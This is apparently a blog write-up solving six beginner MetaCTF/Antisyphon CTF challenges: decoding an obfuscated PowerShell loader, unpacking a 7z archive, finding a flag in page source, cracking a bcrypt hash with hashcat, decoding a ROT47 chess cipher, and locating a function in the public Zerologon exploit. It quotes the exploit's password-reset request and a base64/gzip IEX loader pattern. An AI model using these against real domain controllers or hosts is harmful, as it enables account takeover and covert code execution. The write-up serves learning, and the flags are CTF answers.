Since I have taken Antisyphon training in the past, I am on their email list. I noticed that I received an email from them on November 21st about their Turkey Express Mini CTF. I know about their cyber range but never signed up for it, even though I was curious. Since they released this CTF, I will treat this as a sample for their cyber range. It may not be fair, but I do not have anything to go on.

Challenges
When I signed up for their CTF, I was delighted to see there were only six challenges. While they were only six challenges, I did not want to underestimate them because organizers can make them hard. Surprisingly, only one was challenging enough to solve, at least for me.
Without further delay, I will show you how I solved each challenge.
Welcome to the Obfuscation Games!
Category: Reverse Engineering
During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAR+eWMA/xXJMQrCQBCF4as8BtucQKwEO7uAZRict2Yh7oTMNCLefd3q4+d/HDU5rR4JmVeibPpCDdSG/Cfb042GXT+bq8kZp4IL5M7U63z7GsdfBu/9YMRi3viTDosm3BlXAAAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
A lot of CTFs usually start with an easy question. At my current skill level, I do consider this as easy. If I encountered this challenge before my 2020 CTF experience, it would probably take a while for me to figure it out.
Solution 1: CLI
The challenge already gives us a clue that we need to decode Base64, so we will.
andrew@kali:~$ echo 'H4sIAAR+eWMA/xXJMQrCQBCF4as8BtucQKwEO7uAZRict2Yh7oTMNCLefd3q4+d/HDU5rR4JmVeibPpCDdSG/Cfb042GXT+bq8kZp4IL5M7U63z7GsdfBu/9YMRi3viTDosm3BlXAAAA' | base64 -d ~yc��1 Ԇ�'�Ӎ�]?�����f!��4"�}����59� �W�l�B ����|��_��`�b���&�W
As you can see, it gives us non-alphanumeric characters. Sometimes these characters can redirect to a file, so let’s attempt it.
andrew@kali:~$ echo 'H4sIAAR+eWMA/xXJMQrCQBCF4as8BtucQKwEO7uAZRict2Yh7oTMNCLefd3q4+d/HDU5rR4JmVeibPpCDdSG/Cfb042GXT+bq8kZp4IL5M7U63z7GsdfBu/9YMRi3viTDosm3BlXAAAA' | base64 -d > challenge1
Let’s see if it is a valid file. I typically use the file
command to find information about a file.
andrew@kali:~$ file challenge1 challenge1: gzip compressed data, last modified: Sun Nov 20 01:08:20 2022, original size modulo 2^32 87
It looks like it is a GZIP file. Let’s add a.gz
extension and uncompress the file. Additionally, let’s inspect it using the file
command.
andrew@kali:~$ mv challenge1 challenge1.gz; gzip -d challenge1.gz; file challenge1 challenge1: ASCII text, with no line terminators
Now that we know the type of file, we can use the appropriate software to open it. In this case, we will use the cat
command to see the file’s contents.
andrew@kali:~$ cat challenge1 Write-host "The flag is in the encoded payload"; $f = "MetaCTF{decode_decompress_done}"
Flag
MetaCTF{decode_decompress_done}
Solution 2: CyberChef
The fastest way to get the flag is by using CyberChef. I found out about this software during our internal CTF. The recipe that you need is Magic. The Magic recipe will attempt to automatically figure out the right combination of recipes to get the desired output. I suggest you not rely on it since it will not always work for every challenge.

Staging in 1…2…3
Category: Forensics
The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.
There was a suspicious file created during the timeframe of Threat Actor activity: C:\xyz.tmp (mirror). Can you check it out?
Solution
First, we need to download the file.
andrew@kali:~$ wget https://metaproblems.com/89f75cd8a7cc6b82879c0821e00179e1/xyz.tmp
andrew@kali:~$ wget https://metaproblems.com/89f75cd8a7cc6b82879c0821e00179e1/xyz.tmp --2022-11-22 19:58:05-- https://metaproblems.com/89f75cd8a7cc6b82879c0821e00179e1/xyz.tmp Resolving metaproblems.com (metaproblems.com)... 35.173.187.102 Connecting to metaproblems.com (metaproblems.com)|35.173.187.102|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 192993 (188K) Saving to: ‘xyz.tmp’ xyz.tmp 100%[==============================================================================================================>] 188.47K 1.16MB/s in 0.2s 2022-11-22 19:58:06 (1.16 MB/s) - ‘xyz.tmp’ saved [192993/192993]
Second, we need to inspect what kind of file it is.
andrew@kali:~$ file xyz.tmp xyz.tmp: 7-zip archive data, version 0.4
We need to uncompress the file using the 7zip utility.
andrew@kali:~$ 7z x xyz.tmp
andrew@kali:~$ 7z x xyz.tmp 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i3-6100U CPU @ 2.30GHz (306A0),ASM,AES-NI) Scanning the drive for archives: 1 file, 192993 bytes (189 KiB) Extracting archive: xyz.tmp -- Path = xyz.tmp Type = 7z Physical Size = 192993 Headers Size = 422 Method = LZMA2:192k Solid = + Blocks = 1 Everything is Ok Folders: 4 Files: 3 Size: 193257 Compressed: 192993
Once uncompressed, we need to figure out what files or directories are present.
andrew@kali:~$ ls -l total 236 drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Desktop drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Documents drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Downloads drwx------ 5 andrew andrew 4096 Oct 20 2020 MetaCTF{you_might_consider_using_encryption} drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Music drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Pictures drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Public drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Templates drwxr-xr-t 2 andrew andrew 4096 Jun 11 2021 thinclient_drives drwxr-xr-x 2 andrew andrew 4096 Jun 11 2021 Videos -rw-r--r-- 1 andrew andrew 192993 Nov 19 16:56 xyz.tmp
It looks like we do not need to dig further for the flag!
Flag
MetaCTF{you_might_consider_using_encryption}
The Impossible Survey
Your company just developed a new product, and before releasing it to the public, they decided to gauge the reactions from their employees through a survey. As an incentive, the participants get a gift card after completing it. A company-wide email was sent a while ago, yet no one has submitted the survey or claimed the gift card code.
Can you be the first one?

Solution
My first instinct was to enter something in the form. The first value I entered was 42. Yes, it is in reference to The Hitchhiker’s Guide to the Galaxy. When I hit the Next button, I received an error message: “Too short (need at least 50 characters)”.
Next, I entered a bunch of random words to be over 50 characters, but I got the same error message. From there, I decided to look at the page source.
Once I looked at the source, I searched for MetaCTF{ keyword. Sure enough, I found the flag.

Flag
MetaCTF{so_whos_going_to_report_this_bug_to_google}
Diving into the Announcement
Category: Reconnaissance
Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept (POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. At some point, Microsoft announced CVE-2020-1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.
Solution
Using the CVE-2020-1472 exploit keyword on Google, the first result points to this GitHub page. According to the Read Me file, the software will reset the DC’s account password with an empty string if it is vulnerable. Armed with this information, we need to find the function within the script that sets the password with an empty string.
After skimming through the code, I found a section talking about passwords. Then, I noticed a line that has \x00
. This Hex value means NULL in Python, so I figured the function I am looking for is nrpc.NetrServerPasswordSet2
.
cve-2020-1472-exploit.py
ClearNewPassword: A NL_TRUST_PASSWORD structure, as specified in section 2.2.1.3.7, that contains the new password encrypted as specified in Calling NetrServerPasswordSet2 (section 3.4.5.2.5). typedef struct _NL_TRUST_PASSWORD { WCHAR Buffer[256]; ULONG Length; } ReturnAuthenticator: A NETLOGON_AUTHENTICATOR structure, as specified in section 2.2.1.1.5, that contains the server return authenticator. More info can be found on the [MS-NRPC]-170915.pdf """ request = nrpc.NetrServerPasswordSet2() request["PrimaryName"] = dc_handle + "\x00" request["AccountName"] = target_computer + "$\x00" request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel authenticator = nrpc.NETLOGON_AUTHENTICATOR() authenticator["Credential"] = b"\x00" * 8 authenticator["Timestamp"] = 0 request["Authenticator"] = authenticator request["ComputerName"] = target_computer + "\x00" request["ClearNewPassword"] = b"\x00" * 516 return rpc_con.request(request)
Flag
MetaCTF{nrpc.NetrServerPasswordSet2}
A Confident Hash
Check out this hash. Can you crack it? Here’s a wordlist you can use (mirror). You only have 5 attempts to get the flag right.
$2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS
This post contains affiliate links. If you use these links to buy something I may earn a commission. Full disclosure here.
Want to learn about ethical hacking?
INE has a lot of courses including ethical hacking. Get your subscription today!
Solution
With our internal CTF, I had so much practice with password cracking. The first task in cracking hashes is to find out what kind of hash it is. With hashcat
, we can look at the help menu to identify.
andrew@kali:~$ hashcat --help | grep '$2' 3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
Once we identify the hash, we can perform a dictionary attack using the wordlist provided.
andrew@kali:~$ hashcat -a 0 -m 3200 ‘$2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS’ confident_dict.txt
andrew@kali:~$ hashcat -a 0 -m 3200 '$2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS' confident_dict.txt hashcat (v6.2.5-364-g308d8f227) starting * Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable. You have been warned. METAL API (Metal 306.2.4) ========================= * Device #1: Apple M1 Max, 10880/21845 MB, 32MCU OpenCL API (OpenCL 1.2 (Sep 30 2022 01:38:14)) - Platform #1 [Apple] ==================================================================== * Device #2: Apple M1 Max, skipped Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 72 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Single-Hash * Single-Salt Watchdog: Temperature abort trigger set to 100c Host memory required for this attack: 70 MB Dictionary cache built: * Filename..: confident_dict.txt * Passwords.: 75 * Bytes.....: 1099 * Keyspace..: 75 * Runtime...: 0 secs The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework Approaching final keyspace - workload adjusted. $2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJVgirU/MWOS:galactica_hash Session..........: hashcat Status...........: Cracked Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix)) Hash.Target......: $2a$04$KMCaaiytS5OIsg2UZtthzugkZUPDqQ/Zyoys8XAY6AJV...U/MWOS Time.Started.....: Tue Nov 22 22:33:04 2022 (0 secs) Time.Estimated...: Tue Nov 22 22:33:04 2022 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (confident_dict.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 957 H/s (8.56ms) @ Accel:2 Loops:4 Thr:8 Vec:1 Recovered.Total..: 1/1 (100.00%) Digests Progress.........: 75/75 (100.00%) Rejected.........: 0/75 (0.00%) Restore.Point....: 0/75 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:12-16 Candidate.Engine.: Device Generator Candidates.#1....: runtime_colossus -> spartan_windows Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0% Hardware.Mon.#1..: Util: 93% Started: Tue Nov 22 22:33:03 2022 Stopped: Tue Nov 22 22:33:06 2022
Flag
MetaCTF{galactica_hash}
King to Queen 3
Category: Cryptography
An employee on the network has been emailing these chess puzzles everyday to someone outside of the domain, and nobody really thought it was suspicious until they saw this weird string sent to that same person on the following day:F^mY;L?t24Zk.m^-hnWl,[l)[ku
The SOC team has provided an archive (mirror) of the email attachments, and has tasked you to investigate the actual contents of the ciphertext. Can you figure out what they’ve been saying?
Hint: The flag is wrapped in MetaCTF{}. This should be enough to help you figure out the encoding.
Solution
I played chess in my teens and was one of the representatives of our school in competitions. That said, I knew how to record chess moves. No, I was not very good. My record was one game, and it was a draw. Anyway, I figured I must solve each chess puzzle to help figure out the plaintext.
Chess puzzles, typically, give you information about whose turn it is and how many moves before checkmate. Since there was no information, I analyzed each puzzle and figured out that it was white’s move and was checkmate in one.
In the first image, we need to move the queen piece to box H7. If we were to record this, the chess notation is Qh7.
Now, we need to solve the second chess puzzle. Again, we need to use the queen piece and move it to A8. The chess notation is Qa8.
Looking at the third chess puzzle, we need to use the rook piece and move it to E7. The chess notation is Re7.
When we look at the fourth chess puzzle, we need to use the pawn piece and move it to D5. Typically, the chess notation for this is d5. However, some folks write it down as Pd5. For this challenge, we will jot it down as Pd5. You will find out why later.
Looking at the fifth chess puzzle, we need to use the bishop piece and move it to B5. The chess notation is Bb5.
When we look at the sixth chess puzzle, we need to use the knight piece and move it to B6. The chess notation is Nb6.
Looking at the seventh chess puzzle, we need to use the rook piece and move it to A8. The chess notation is Ra8.
Looking at the eighth chess puzzle, we need to use the rook piece and move it to H8. The chess notation is Rh8.
Lastly, the ninth chess puzzle requires us to use the queen piece and move it to H8. The chess notation is Qh8.
Bringing it all together
If we add the chess notations together, we have 27 characters. If we count the characters of the ciphertext, we also get 27. It seems like we are in the right direction.
What took a while for me was trying to figure out what everything meant. I knew I needed to figure out what cipher the challenge creator used to encrypt the plaintext.
My first instinct was to use ROT13 because it is a commonly used cipher in CTFs. Without thinking, I used it, and it did not work. Then, I realized that the ciphertext had a bunch of special characters. It makes sense that ROT13 did not work.
I then tried other ones, but they did not work. My gut feeling was that the cipher was a derivative of ROT13, so I browsed through CyberChef and found the ROT47 Brute Force recipe.
Looking at the screenshot below, you will notice that the first three characters match exactly the flag format. Also, if you look at the rotation number, it is the same number in the chess notation of the first puzzle.

To confirm this is not a coincidence, change the recipe to ROT47, then change the value to 8. As you can see, the following three characters match the flag format. If you follow the same methodology for the rest, you will get the complete message, which is the flag.

Flag
MetaCTF{99_p3rc3nt_t4ct1cs}
Final thoughts
The CTF seems geared toward beginners, and that is okay. We all have to start somewhere. The challenges are not that hard for my current knowledge and skill level. Admittedly, I do consider King to Queen 3 the most challenging one out of all of them.
Participating in CTFs is addicting, at least for me. It can also be infuriating sometimes when I cannot solve the challenges. One of the reasons I like participating in CTF is that I always learn something new. This time around, I learned about ROT47. If you have not participated in one, you should try it and not feel intimidated. I suggest you start with easy ones first and build your skill level to where you can solve more challenging questions. Happy hunting!
You might like to read
BUY ME COFFEE ☕